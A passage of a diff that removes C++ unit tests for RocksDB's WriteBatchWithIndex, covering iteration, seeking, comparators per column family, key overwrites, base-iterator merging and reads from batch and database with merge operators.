-    for (auto pair = data_map.rbegin(); pair != data_map.rend(); ++pair) {
-      for (auto v = pair->second.rbegin(); v != pair->second.rend(); v++) {
-        ASSERT_OK(iter->status());
-        ASSERT_TRUE(iter->Valid());
-        auto write_entry = iter->Entry();
-        ASSERT_EQ(pair->first, write_entry.key.ToString());
-        ASSERT_EQ((*v)->type, write_entry.type);
-        if (write_entry.type != kDeleteRecord) {
-          ASSERT_EQ((*v)->value, write_entry.value.ToString());
-        }
-        iter->Prev();
-      }
-    }
-    ASSERT_TRUE(!iter->Valid());
-  }
-
-  // Iterator all indexes
-  {
-    std::unique_ptr<WBWIIterator> iter(batch->NewIterator(&index));
-    for (int seek_to_first : {0, 1}) {
-      if (seek_to_first) {
-        iter->SeekToFirst();
-      } else {
-        iter->Seek("");
-      }
-      for (auto pair : index_map) {
-        for (auto v : pair.second) {
-          ASSERT_OK(iter->status());
-          ASSERT_TRUE(iter->Valid());
-          auto write_entry = iter->Entry();
-          ASSERT_EQ(pair.first, write_entry.key.ToString());
-          if (v->type != kDeleteRecord) {
-            ASSERT_EQ(v->key, write_entry.value.ToString());
-            ASSERT_EQ(v->value, write_entry.key.ToString());
-          }
-          iter->Next();
-        }
-      }
-      ASSERT_TRUE(!iter->Valid());
-    }
-
-    iter->SeekToLast();
-    for (auto pair = index_map.rbegin(); pair != index_map.rend(); ++pair) {
-      for (auto v = pair->second.rbegin(); v != pair->second.rend(); v++) {
-        ASSERT_OK(iter->status());
-        ASSERT_TRUE(iter->Valid());
-        auto write_entry = iter->Entry();
-        ASSERT_EQ(pair->first, write_entry.key.ToString());
-        if ((*v)->type != kDeleteRecord) {
-          ASSERT_EQ((*v)->key, write_entry.value.ToString());
-          ASSERT_EQ((*v)->value, write_entry.key.ToString());
-        }
-        iter->Prev();
-      }
-    }
-    ASSERT_TRUE(!iter->Valid());
-  }
-
-  // Seek to every key
-  {
-    std::unique_ptr<WBWIIterator> iter(batch->NewIterator(&data));
-
-    // Seek the keys one by one in reverse order
-    for (auto pair = data_map.rbegin(); pair != data_map.rend(); ++pair) {
-      iter->Seek(pair->first);
-      ASSERT_OK(iter->status());
-      for (auto v : pair->second) {
-        ASSERT_TRUE(iter->Valid());
-        auto write_entry = iter->Entry();
-        ASSERT_EQ(pair->first, write_entry.key.ToString());
-        ASSERT_EQ(v->type, write_entry.type);
-        if (write_entry.type != kDeleteRecord) {
-          ASSERT_EQ(v->value, write_entry.value.ToString());
-        }
-        iter->Next();
-        ASSERT_OK(iter->status());
-      }
-    }
-  }
-
-  // Seek to every index
-  {
-    std::unique_ptr<WBWIIterator> iter(batch->NewIterator(&index));
-
-    // Seek the keys one by one in reverse order
-    for (auto pair = index_map.rbegin(); pair != index_map.rend(); ++pair) {
-      iter->Seek(pair->first);
-      ASSERT_OK(iter->status());
-      for (auto v : pair->second) {
-        ASSERT_TRUE(iter->Valid());
-        auto write_entry = iter->Entry();
-        ASSERT_EQ(pair->first, write_entry.key.ToString());
-        ASSERT_EQ(v->value, write_entry.key.ToString());
-        if (v->type != kDeleteRecord) {
-          ASSERT_EQ(v->key, write_entry.value.ToString());
-        }
-        iter->Next();
-        ASSERT_OK(iter->status());
-      }
-    }
-  }
-
-  // Verify WriteBatch can be iterated
-  TestHandler handler;
-  batch->GetWriteBatch()->Iterate(&handler);
-
-  // Verify data column family
-  {
-    ASSERT_EQ(entries.size(), handler.seen[data.GetID()].size());
-    size_t i = 0;
-    for (auto e : handler.seen[data.GetID()]) {
-      auto write_entry = entries[i++];
-      ASSERT_EQ(e.type, write_entry.type);
-      ASSERT_EQ(e.key, write_entry.key);
-      if (e.type != kDeleteRecord) {
-        ASSERT_EQ(e.value, write_entry.value);
-      }
-    }
-  }
-
-  // Verify index column family
-  {
-    ASSERT_EQ(entries.size(), handler.seen[index.GetID()].size());
-    size_t i = 0;
-    for (auto e : handler.seen[index.GetID()]) {
-      auto write_entry = entries[i++];
-      ASSERT_EQ(e.key, write_entry.value);
-      if (write_entry.type != kDeleteRecord) {
-        ASSERT_EQ(e.value, write_entry.key);
-      }
-    }
-  }
-}
-
-TEST_F(WriteBatchWithIndexTest, TestValueAsSecondaryIndex) {
-  Entry entries[] = {
-      {"aaa", "0005", kPutRecord},
-      {"b", "0002", kPutRecord},
-      {"cdd", "0002", kMergeRecord},
-      {"aab", "00001", kPutRecord},
-      {"cc", "00005", kPutRecord},
-      {"cdd", "0002", kPutRecord},
-      {"aab", "0003", kPutRecord},
-      {"cc", "00005", kDeleteRecord},
-  };
-  std::vector<Entry> entries_list(entries, entries + 8);
-
-  WriteBatchWithIndex batch(nullptr, 20);
-
-  TestValueAsSecondaryIndexHelper(entries_list, &batch);
-
-  // Clear batch and re-run test with new values
-  batch.Clear();
-
-  Entry new_entries[] = {
-      {"aaa", "0005", kPutRecord},
-      {"e", "0002", kPutRecord},
-      {"add", "0002", kMergeRecord},
-      {"aab", "00001", kPutRecord},
-      {"zz", "00005", kPutRecord},
-      {"add", "0002", kPutRecord},
-      {"aab", "0003", kPutRecord},
-      {"zz", "00005", kDeleteRecord},
-  };
-
-  entries_list = std::vector<Entry>(new_entries, new_entries + 8);
-
-  TestValueAsSecondaryIndexHelper(entries_list, &batch);
-}
-
-TEST_F(WriteBatchWithIndexTest, TestComparatorForCF) {
-  ColumnFamilyHandleImplDummy cf1(6, nullptr);
-  ColumnFamilyHandleImplDummy reverse_cf(66, ReverseBytewiseComparator());
-  ColumnFamilyHandleImplDummy cf2(88, BytewiseComparator());
-  WriteBatchWithIndex batch(BytewiseComparator(), 20);
-
-  batch.Put(&cf1, "ddd", "");
-  batch.Put(&cf2, "aaa", "");
-  batch.Put(&cf2, "eee", "");
-  batch.Put(&cf1, "ccc", "");
-  batch.Put(&reverse_cf, "a11", "");
-  batch.Put(&cf1, "bbb", "");
-
-  Slice key_slices[] = {"a", "3", "3"};
-  Slice value_slice = "";
-  batch.Put(&reverse_cf, SliceParts(key_slices, 3),
-            SliceParts(&value_slice, 1));
-  batch.Put(&reverse_cf, "a22", "");
-
-  {
-    std::unique_ptr<WBWIIterator> iter(batch.NewIterator(&cf1));
-    iter->Seek("");
-    ASSERT_OK(iter->status());
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ("bbb", iter->Entry().key.ToString());
-    iter->Next();
-    ASSERT_OK(iter->status());
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ("ccc", iter->Entry().key.ToString());
-    iter->Next();
-    ASSERT_OK(iter->status());
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ("ddd", iter->Entry().key.ToString());
-    iter->Next();
-    ASSERT_OK(iter->status());
-    ASSERT_TRUE(!iter->Valid());
-  }
-
-  {
-    std::unique_ptr<WBWIIterator> iter(batch.NewIterator(&cf2));
-    iter->Seek("");
-    ASSERT_OK(iter->status());
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ("aaa", iter->Entry().key.ToString());
-    iter->Next();
-    ASSERT_OK(iter->status());
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ("eee", iter->Entry().key.ToString());
-    iter->Next();
-    ASSERT_OK(iter->status());
-    ASSERT_TRUE(!iter->Valid());
-  }
-
-  {
-    std::unique_ptr<WBWIIterator> iter(batch.NewIterator(&reverse_cf));
-    iter->Seek("");
-    ASSERT_OK(iter->status());
-    ASSERT_TRUE(!iter->Valid());
-
-    iter->Seek("z");
-    ASSERT_OK(iter->status());
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ("a33", iter->Entry().key.ToString());
-    iter->Next();
-    ASSERT_OK(iter->status());
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ("a22", iter->Entry().key.ToString());
-    iter->Next();
-    ASSERT_OK(iter->status());
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ("a11", iter->Entry().key.ToString());
-    iter->Next();
-    ASSERT_OK(iter->status());
-    ASSERT_TRUE(!iter->Valid());
-
-    iter->Seek("a22");
-    ASSERT_OK(iter->status());
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ("a22", iter->Entry().key.ToString());
-
-    iter->Seek("a13");
-    ASSERT_OK(iter->status());
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ("a11", iter->Entry().key.ToString());
-  }
-}
-
-TEST_F(WriteBatchWithIndexTest, TestOverwriteKey) {
-  ColumnFamilyHandleImplDummy cf1(6, nullptr);
-  ColumnFamilyHandleImplDummy reverse_cf(66, ReverseBytewiseComparator());
-  ColumnFamilyHandleImplDummy cf2(88, BytewiseComparator());
-  WriteBatchWithIndex batch(BytewiseComparator(), 20, true);
-
-  batch.Put(&cf1, "ddd", "");
-  batch.Merge(&cf1, "ddd", "");
-  batch.Delete(&cf1, "ddd");
-  batch.Put(&cf2, "aaa", "");
-  batch.Delete(&cf2, "aaa");
-  batch.Put(&cf2, "aaa", "aaa");
-  batch.Put(&cf2, "eee", "eee");
-  batch.Put(&cf1, "ccc", "");
-  batch.Put(&reverse_cf, "a11", "");
-  batch.Delete(&cf1, "ccc");
-  batch.Put(&reverse_cf, "a33", "a33");
-  batch.Put(&reverse_cf, "a11", "a11");
-  Slice slices[] = {"a", "3", "3"};
-  batch.Delete(&reverse_cf, SliceParts(slices, 3));
-
-  {
-    std::unique_ptr<WBWIIterator> iter(batch.NewIterator(&cf1));
-    iter->Seek("");
-    ASSERT_OK(iter->status());
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ("ccc", iter->Entry().key.ToString());
-    ASSERT_TRUE(iter->Entry().type == WriteType::kDeleteRecord);
-    iter->Next();
-    ASSERT_OK(iter->status());
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ("ddd", iter->Entry().key.ToString());
-    ASSERT_TRUE(iter->Entry().type == WriteType::kDeleteRecord);
-    iter->Next();
-    ASSERT_OK(iter->status());
-    ASSERT_TRUE(!iter->Valid());
-  }
-
-  {
-    std::unique_ptr<WBWIIterator> iter(batch.NewIterator(&cf2));
-    iter->SeekToLast();
-    ASSERT_OK(iter->status());
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ("eee", iter->Entry().key.ToString());
-    ASSERT_EQ("eee", iter->Entry().value.ToString());
-    iter->Prev();
-    ASSERT_OK(iter->status());
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ("aaa", iter->Entry().key.ToString());
-    ASSERT_EQ("aaa", iter->Entry().value.ToString());
-    iter->Prev();
-    ASSERT_OK(iter->status());
-    ASSERT_TRUE(!iter->Valid());
-
-    iter->SeekToFirst();
-    ASSERT_OK(iter->status());
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ("aaa", iter->Entry().key.ToString());
-    ASSERT_EQ("aaa", iter->Entry().value.ToString());
-    iter->Next();
-    ASSERT_OK(iter->status());
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ("eee", iter->Entry().key.ToString());
-    ASSERT_EQ("eee", iter->Entry().value.ToString());
-    iter->Next();
-    ASSERT_OK(iter->status());
-    ASSERT_TRUE(!iter->Valid());
-  }
-
-  {
-    std::unique_ptr<WBWIIterator> iter(batch.NewIterator(&reverse_cf));
-    iter->Seek("");
-    ASSERT_OK(iter->status());
-    ASSERT_TRUE(!iter->Valid());
-
-    iter->Seek("z");
-    ASSERT_OK(iter->status());
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ("a33", iter->Entry().key.ToString());
-    ASSERT_TRUE(iter->Entry().type == WriteType::kDeleteRecord);
-    iter->Next();
-    ASSERT_OK(iter->status());
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ("a11", iter->Entry().key.ToString());
-    ASSERT_EQ("a11", iter->Entry().value.ToString());
-    iter->Next();
-    ASSERT_OK(iter->status());
-    ASSERT_TRUE(!iter->Valid());
-
-    iter->SeekToLast();
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ("a11", iter->Entry().key.ToString());
-    ASSERT_EQ("a11", iter->Entry().value.ToString());
-    iter->Prev();
-
-    ASSERT_OK(iter->status());
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ("a33", iter->Entry().key.ToString());
-    ASSERT_TRUE(iter->Entry().type == WriteType::kDeleteRecord);
-    iter->Prev();
-    ASSERT_TRUE(!iter->Valid());
-  }
-}
-
-namespace {
-typedef std::map<std::string, std::string> KVMap;
-
-class KVIter : public Iterator {
- public:
-  explicit KVIter(const KVMap* map) : map_(map), iter_(map_->end()) {}
-  virtual bool Valid() const { return iter_ != map_->end(); }
-  virtual void SeekToFirst() { iter_ = map_->begin(); }
-  virtual void SeekToLast() {
-    if (map_->empty()) {
-      iter_ = map_->end();
-    } else {
-      iter_ = map_->find(map_->rbegin()->first);
-    }
-  }
-  virtual void Seek(const Slice& k) { iter_ = map_->lower_bound(k.ToString()); }
-  virtual void SeekForPrev(const Slice& k) {
-    iter_ = map_->upper_bound(k.ToString());
-    Prev();
-  }
-  virtual void Next() { ++iter_; }
-  virtual void Prev() {
-    if (iter_ == map_->begin()) {
-      iter_ = map_->end();
-      return;
-    }
-    --iter_;
-  }
-
-  virtual Slice key() const { return iter_->first; }
-  virtual Slice value() const { return iter_->second; }
-  virtual Status status() const { return Status::OK(); }
-
- private:
-  const KVMap* const map_;
-  KVMap::const_iterator iter_;
-};
-
-void AssertIter(Iterator* iter, const std::string& key,
-                const std::string& value) {
-  ASSERT_OK(iter->status());
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ(key, iter->key().ToString());
-  ASSERT_EQ(value, iter->value().ToString());
-}
-
-void AssertItersEqual(Iterator* iter1, Iterator* iter2) {
-  ASSERT_EQ(iter1->Valid(), iter2->Valid());
-  if (iter1->Valid()) {
-    ASSERT_EQ(iter1->key().ToString(), iter2->key().ToString());
-    ASSERT_EQ(iter1->value().ToString(), iter2->value().ToString());
-  }
-}
-}  // namespace
-
-TEST_F(WriteBatchWithIndexTest, TestRandomIteraratorWithBase) {
-  std::vector<std::string> source_strings = {"a", "b", "c", "d", "e",
-                                             "f", "g", "h", "i", "j"};
-  for (int rand_seed = 301; rand_seed < 366; rand_seed++) {
-    Random rnd(rand_seed);
-
-    ColumnFamilyHandleImplDummy cf1(6, BytewiseComparator());
-    ColumnFamilyHandleImplDummy cf2(2, BytewiseComparator());
-    ColumnFamilyHandleImplDummy cf3(8, BytewiseComparator());
-
-    WriteBatchWithIndex batch(BytewiseComparator(), 20, true);
-
-    if (rand_seed % 2 == 0) {
-      batch.Put(&cf2, "zoo", "bar");
-    }
-    if (rand_seed % 4 == 1) {
-      batch.Put(&cf3, "zoo", "bar");
-    }
-
-    KVMap map;
-    KVMap merged_map;
-    for (auto key : source_strings) {
-      std::string value = key + key;
-      int type = rnd.Uniform(6);
-      switch (type) {
-        case 0:
-          // only base has it
-          map[key] = value;
-          merged_map[key] = value;
-          break;
-        case 1:
-          // only delta has it
-          batch.Put(&cf1, key, value);
-          map[key] = value;
-          merged_map[key] = value;
-          break;
-        case 2:
-          // both has it. Delta should win
-          batch.Put(&cf1, key, value);
-          map[key] = "wrong_value";
-          merged_map[key] = value;
-          break;
-        case 3:
-          // both has it. Delta is delete
-          batch.Delete(&cf1, key);
-          map[key] = "wrong_value";
-          break;
-        case 4:
-          // only delta has it. Delta is delete
-          batch.Delete(&cf1, key);
-          map[key] = "wrong_value";
-          break;
-        default:
-          // Neither iterator has it.
-          break;
-      }
-    }
-
-    std::unique_ptr<Iterator> iter(
-        batch.NewIteratorWithBase(&cf1, new KVIter(&map)));
-    std::unique_ptr<Iterator> result_iter(new KVIter(&merged_map));
-
-    bool is_valid = false;
-    for (int i = 0; i < 128; i++) {
-      // Random walk and make sure iter and result_iter returns the
-      // same key and value
-      int type = rnd.Uniform(5);
-      ASSERT_OK(iter->status());
-      switch (type) {
-        case 0:
-          // Seek to First
-          iter->SeekToFirst();
-          result_iter->SeekToFirst();
-          break;
-        case 1:
-          // Seek to last
-          iter->SeekToLast();
-          result_iter->SeekToLast();
-          break;
-        case 2: {
-          // Seek to random key
-          auto key_idx = rnd.Uniform(static_cast<int>(source_strings.size()));
-          auto key = source_strings[key_idx];
-          iter->Seek(key);
-          result_iter->Seek(key);
-          break;
-        }
-        case 3:
-          // Next
-          if (is_valid) {
-            iter->Next();
-            result_iter->Next();
-          } else {
-            continue;
-          }
-          break;
-        default:
-          assert(type == 4);
-          // Prev
-          if (is_valid) {
-            iter->Prev();
-            result_iter->Prev();
-          } else {
-            continue;
-          }
-          break;
-      }
-      AssertItersEqual(iter.get(), result_iter.get());
-      is_valid = iter->Valid();
-    }
-  }
-}
-
-TEST_F(WriteBatchWithIndexTest, TestIteraratorWithBase) {
-  ColumnFamilyHandleImplDummy cf1(6, BytewiseComparator());
-  ColumnFamilyHandleImplDummy cf2(2, BytewiseComparator());
-  WriteBatchWithIndex batch(BytewiseComparator(), 20, true);
-
-  {
-    KVMap map;
-    map["a"] = "aa";
-    map["c"] = "cc";
-    map["e"] = "ee";
-    std::unique_ptr<Iterator> iter(
-        batch.NewIteratorWithBase(&cf1, new KVIter(&map)));
-
-    iter->SeekToFirst();
-    AssertIter(iter.get(), "a", "aa");
-    iter->Next();
-    AssertIter(iter.get(), "c", "cc");
-    iter->Next();
-    AssertIter(iter.get(), "e", "ee");
-    iter->Next();
-    ASSERT_OK(iter->status());
-    ASSERT_TRUE(!iter->Valid());
-
-    iter->SeekToLast();
-    AssertIter(iter.get(), "e", "ee");
-    iter->Prev();
-    AssertIter(iter.get(), "c", "cc");
-    iter->Prev();
-    AssertIter(iter.get(), "a", "aa");
-    iter->Prev();
-    ASSERT_OK(iter->status());
-    ASSERT_TRUE(!iter->Valid());
-
-    iter->Seek("b");
-    AssertIter(iter.get(), "c", "cc");
-
-    iter->Prev();
-    AssertIter(iter.get(), "a", "aa");
-
-    iter->Seek("a");
-    AssertIter(iter.get(), "a", "aa");
-  }
-
-  // Test the case that there is one element in the write batch
-  batch.Put(&cf2, "zoo", "bar");
-  batch.Put(&cf1, "a", "aa");
-  {
-    KVMap empty_map;
-    std::unique_ptr<Iterator> iter(
-        batch.NewIteratorWithBase(&cf1, new KVIter(&empty_map)));
-
-    iter->SeekToFirst();
-    AssertIter(iter.get(), "a", "aa");
-    iter->Next();
-    ASSERT_OK(iter->status());
-    ASSERT_TRUE(!iter->Valid());
-  }
-
-  batch.Delete(&cf1, "b");
-  batch.Put(&cf1, "c", "cc");
-  batch.Put(&cf1, "d", "dd");
-  batch.Delete(&cf1, "e");
-
-  {
-    KVMap map;
-    map["b"] = "";
-    map["cc"] = "cccc";
-    map["f"] = "ff";
-    std::unique_ptr<Iterator> iter(
-        batch.NewIteratorWithBase(&cf1, new KVIter(&map)));
-
-    iter->SeekToFirst();
-    AssertIter(iter.get(), "a", "aa");
-    iter->Next();
-    AssertIter(iter.get(), "c", "cc");
-    iter->Next();
-    AssertIter(iter.get(), "cc", "cccc");
-    iter->Next();
-    AssertIter(iter.get(), "d", "dd");
-    iter->Next();
-    AssertIter(iter.get(), "f", "ff");
-    iter->Next();
-    ASSERT_OK(iter->status());
-    ASSERT_TRUE(!iter->Valid());
-
-    iter->SeekToLast();
-    AssertIter(iter.get(), "f", "ff");
-    iter->Prev();
-    AssertIter(iter.get(), "d", "dd");
-    iter->Prev();
-    AssertIter(iter.get(), "cc", "cccc");
-    iter->Prev();
-    AssertIter(iter.get(), "c", "cc");
-    iter->Next();
-    AssertIter(iter.get(), "cc", "cccc");
-    iter->Prev();
-    AssertIter(iter.get(), "c", "cc");
-    iter->Prev();
-    AssertIter(iter.get(), "a", "aa");
-    iter->Prev();
-    ASSERT_OK(iter->status());
-    ASSERT_TRUE(!iter->Valid());
-
-    iter->Seek("c");
-    AssertIter(iter.get(), "c", "cc");
-
-    iter->Seek("cb");
-    AssertIter(iter.get(), "cc", "cccc");
-
-    iter->Seek("cc");
-    AssertIter(iter.get(), "cc", "cccc");
-    iter->Next();
-    AssertIter(iter.get(), "d", "dd");
-
-    iter->Seek("e");
-    AssertIter(iter.get(), "f", "ff");
-
-    iter->Prev();
-    AssertIter(iter.get(), "d", "dd");
-
-    iter->Next();
-    AssertIter(iter.get(), "f", "ff");
-  }
-
-  {
-    KVMap empty_map;
-    std::unique_ptr<Iterator> iter(
-        batch.NewIteratorWithBase(&cf1, new KVIter(&empty_map)));
-
-    iter->SeekToFirst();
-    AssertIter(iter.get(), "a", "aa");
-    iter->Next();
-    AssertIter(iter.get(), "c", "cc");
-    iter->Next();
-    AssertIter(iter.get(), "d", "dd");
-    iter->Next();
-    ASSERT_OK(iter->status());
-    ASSERT_TRUE(!iter->Valid());
-
-    iter->SeekToLast();
-    AssertIter(iter.get(), "d", "dd");
-    iter->Prev();
-    AssertIter(iter.get(), "c", "cc");
-    iter->Prev();
-    AssertIter(iter.get(), "a", "aa");
-
-    iter->Prev();
-    ASSERT_OK(iter->status());
-    ASSERT_TRUE(!iter->Valid());
-
-    iter->Seek("aa");
-    AssertIter(iter.get(), "c", "cc");
-    iter->Next();
-    AssertIter(iter.get(), "d", "dd");
-
-    iter->Seek("ca");
-    AssertIter(iter.get(), "d", "dd");
-
-    iter->Prev();
-    AssertIter(iter.get(), "c", "cc");
-  }
-}
-
-TEST_F(WriteBatchWithIndexTest, TestIteraratorWithBaseReverseCmp) {
-  ColumnFamilyHandleImplDummy cf1(6, ReverseBytewiseComparator());
-  ColumnFamilyHandleImplDummy cf2(2, ReverseBytewiseComparator());
-  WriteBatchWithIndex batch(BytewiseComparator(), 20, true);
-
-  // Test the case that there is one element in the write batch
-  batch.Put(&cf2, "zoo", "bar");
-  batch.Put(&cf1, "a", "aa");
-  {
-    KVMap empty_map;
-    std::unique_ptr<Iterator> iter(
-        batch.NewIteratorWithBase(&cf1, new KVIter(&empty_map)));
-
-    iter->SeekToFirst();
-    AssertIter(iter.get(), "a", "aa");
-    iter->Next();
-    ASSERT_OK(iter->status());
-    ASSERT_TRUE(!iter->Valid());
-  }
-
-  batch.Put(&cf1, "c", "cc");
-  {
-    KVMap map;
-    std::unique_ptr<Iterator> iter(
-        batch.NewIteratorWithBase(&cf1, new KVIter(&map)));
-
-    iter->SeekToFirst();
-    AssertIter(iter.get(), "c", "cc");
-    iter->Next();
-    AssertIter(iter.get(), "a", "aa");
-    iter->Next();
-    ASSERT_OK(iter->status());
-    ASSERT_TRUE(!iter->Valid());
-
-    iter->SeekToLast();
-    AssertIter(iter.get(), "a", "aa");
-    iter->Prev();
-    AssertIter(iter.get(), "c", "cc");
-    iter->Prev();
-    ASSERT_OK(iter->status());
-    ASSERT_TRUE(!iter->Valid());
-
-    iter->Seek("b");
-    AssertIter(iter.get(), "a", "aa");
-
-    iter->Prev();
-    AssertIter(iter.get(), "c", "cc");
-
-    iter->Seek("a");
-    AssertIter(iter.get(), "a", "aa");
-  }
-
-  // default column family
-  batch.Put("a", "b");
-  {
-    KVMap map;
-    map["b"] = "";
-    std::unique_ptr<Iterator> iter(batch.NewIteratorWithBase(new KVIter(&map)));
-
-    iter->SeekToFirst();
-    AssertIter(iter.get(), "a", "b");
-    iter->Next();
-    AssertIter(iter.get(), "b", "");
-    iter->Next();
-    ASSERT_OK(iter->status());
-    ASSERT_TRUE(!iter->Valid());
-
-    iter->SeekToLast();
-    AssertIter(iter.get(), "b", "");
-    iter->Prev();
-    AssertIter(iter.get(), "a", "b");
-    iter->Prev();
-    ASSERT_OK(iter->status());
-    ASSERT_TRUE(!iter->Valid());
-
-    iter->Seek("b");
-    AssertIter(iter.get(), "b", "");
-
-    iter->Prev();
-    AssertIter(iter.get(), "a", "b");
-
-    iter->Seek("0");
-    AssertIter(iter.get(), "a", "b");
-  }
-}
-
-TEST_F(WriteBatchWithIndexTest, TestGetFromBatch) {
-  Options options;
-  WriteBatchWithIndex batch;
-  Status s;
-  std::string value;
-
-  s = batch.GetFromBatch(options, "b", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  batch.Put("a", "a");
-  batch.Put("b", "b");
-  batch.Put("c", "c");
-  batch.Put("a", "z");
-  batch.Delete("c");
-  batch.Delete("d");
-  batch.Delete("e");
-  batch.Put("e", "e");
-
-  s = batch.GetFromBatch(options, "b", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("b", value);
-
-  s = batch.GetFromBatch(options, "a", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("z", value);
-
-  s = batch.GetFromBatch(options, "c", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  s = batch.GetFromBatch(options, "d", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  s = batch.GetFromBatch(options, "x", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  s = batch.GetFromBatch(options, "e", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("e", value);
-
-  batch.Merge("z", "z");
-
-  s = batch.GetFromBatch(options, "z", &value);
-  ASSERT_NOK(s);  // No merge operator specified.
-
-  s = batch.GetFromBatch(options, "b", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("b", value);
-}
-
-TEST_F(WriteBatchWithIndexTest, TestGetFromBatchMerge) {
-  DB* db;
-  Options options;
-  options.merge_operator = MergeOperators::CreateFromStringId("stringappend");
-  options.create_if_missing = true;
-
-  std::string dbname = test::TmpDir() + "/write_batch_with_index_test";
-
-  DestroyDB(dbname, options);
-  Status s = DB::Open(options, dbname, &db);
-  ASSERT_OK(s);
-
-  ColumnFamilyHandle* column_family = db->DefaultColumnFamily();
-  WriteBatchWithIndex batch;
-  std::string value;
-
-  s = batch.GetFromBatch(options, "x", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  batch.Put("x", "X");
-  std::string expected = "X";
-
-  for (int i = 0; i < 5; i++) {
-    batch.Merge("x", ToString(i));
-    expected = expected + "," + ToString(i);
-
-    if (i % 2 == 0) {
-      batch.Put("y", ToString(i / 2));
-    }
-
-    batch.Merge("z", "z");
-
-    s = batch.GetFromBatch(column_family, options, "x", &value);
-    ASSERT_OK(s);
-    ASSERT_EQ(expected, value);
-
-    s = batch.GetFromBatch(column_family, options, "y", &value);
-    ASSERT_OK(s);
-    ASSERT_EQ(ToString(i / 2), value);
-
-    s = batch.GetFromBatch(column_family, options, "z", &value);
-    ASSERT_TRUE(s.IsMergeInProgress());
-  }
-
-  delete db;
-  DestroyDB(dbname, options);
-}
-
-TEST_F(WriteBatchWithIndexTest, TestGetFromBatchMerge2) {
-  DB* db;
-  Options options;
-  options.merge_operator = MergeOperators::CreateFromStringId("stringappend");
-  options.create_if_missing = true;
-
-  std::string dbname = test::TmpDir() + "/write_batch_with_index_test";
-
-  DestroyDB(dbname, options);
-  Status s = DB::Open(options, dbname, &db);
-  ASSERT_OK(s);
-
-  ColumnFamilyHandle* column_family = db->DefaultColumnFamily();
-
-  // Test batch with overwrite_key=true
-  WriteBatchWithIndex batch(BytewiseComparator(), 0, true);
-  std::string value;
-
-  s = batch.GetFromBatch(column_family, options, "X", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  batch.Put(column_family, "X", "x");
-  s = batch.GetFromBatch(column_family, options, "X", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("x", value);
-
-  batch.Put(column_family, "X", "x2");
-  s = batch.GetFromBatch(column_family, options, "X", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("x2", value);
-
-  batch.Merge(column_family, "X", "aaa");
-  s = batch.GetFromBatch(column_family, options, "X", &value);
-  ASSERT_TRUE(s.IsMergeInProgress());
-
-  batch.Merge(column_family, "X", "bbb");
-  s = batch.GetFromBatch(column_family, options, "X", &value);
-  ASSERT_TRUE(s.IsMergeInProgress());
-
-  batch.Put(column_family, "X", "x3");
-  s = batch.GetFromBatch(column_family, options, "X", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("x3", value);
-
-  batch.Merge(column_family, "X", "ccc");
-  s = batch.GetFromBatch(column_family, options, "X", &value);
-  ASSERT_TRUE(s.IsMergeInProgress());
-
-  batch.Delete(column_family, "X");
-  s = batch.GetFromBatch(column_family, options, "X", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  batch.Merge(column_family, "X", "ddd");
-  s = batch.GetFromBatch(column_family, options, "X", &value);
-  ASSERT_TRUE(s.IsMergeInProgress());
-
-  delete db;
-  DestroyDB(dbname, options);
-}
-
-TEST_F(WriteBatchWithIndexTest, TestGetFromBatchAndDB) {
-  DB* db;
-  Options options;
-  options.create_if_missing = true;
-  std::string dbname = test::TmpDir() + "/write_batch_with_index_test";
-
-  DestroyDB(dbname, options);
-  Status s = DB::Open(options, dbname, &db);
-  ASSERT_OK(s);
-
-  WriteBatchWithIndex batch;
-  ReadOptions read_options;
-  WriteOptions write_options;
-  std::string value;
-
-  s = db->Put(write_options, "a", "a");
-  ASSERT_OK(s);
-
-  s = db->Put(write_options, "b", "b");
-  ASSERT_OK(s);
-
-  s = db->Put(write_options, "c", "c");
-  ASSERT_OK(s);
-
-  batch.Put("a", "batch.a");
-  batch.Delete("b");
-
-  s = batch.GetFromBatchAndDB(db, read_options, "a", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("batch.a", value);
-
-  s = batch.GetFromBatchAndDB(db, read_options, "b", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  s = batch.GetFromBatchAndDB(db, read_options, "c", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("c", value);
-
-  s = batch.GetFromBatchAndDB(db, read_options, "x", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  db->Delete(write_options, "x");
-
-  s = batch.GetFromBatchAndDB(db, read_options, "x", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  delete db;
-  DestroyDB(dbname, options);
-}
-
-TEST_F(WriteBatchWithIndexTest, TestGetFromBatchAndDBMerge) {
-  DB* db;
-  Options options;
-
-  options.create_if_missing = true;
